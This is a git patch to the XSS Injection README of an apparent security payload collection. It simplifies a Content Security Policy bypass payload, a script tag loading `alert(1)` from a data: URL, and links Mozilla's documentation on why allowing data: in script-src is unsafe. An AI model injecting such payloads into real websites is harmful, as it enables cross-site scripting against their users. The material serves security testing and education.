From 7996b4f905e1a301acacc7c03e674eac3a3acf2e Mon Sep 17 00:00:00 2001
From: Markus <mail@markusschader.de>
Date: Fri, 1 Oct 2021 16:10:23 +0200
Subject: [PATCH] Update XSS README.md

Remove unnecessary complexity from CSP bypass payload
---
 XSS Injection/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index a1ae92c..f17abf3 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -1072,10 +1072,10 @@ Works for CSP like `script-src self`
 
 ### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
 
-Works for CSP like `script-src 'self' data:`
+Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
 
 ```javascript
-<script ?/src="data:+,\u0061lert%281%29">/</script>
+<script src="data:,alert(1)">/</script>
 ```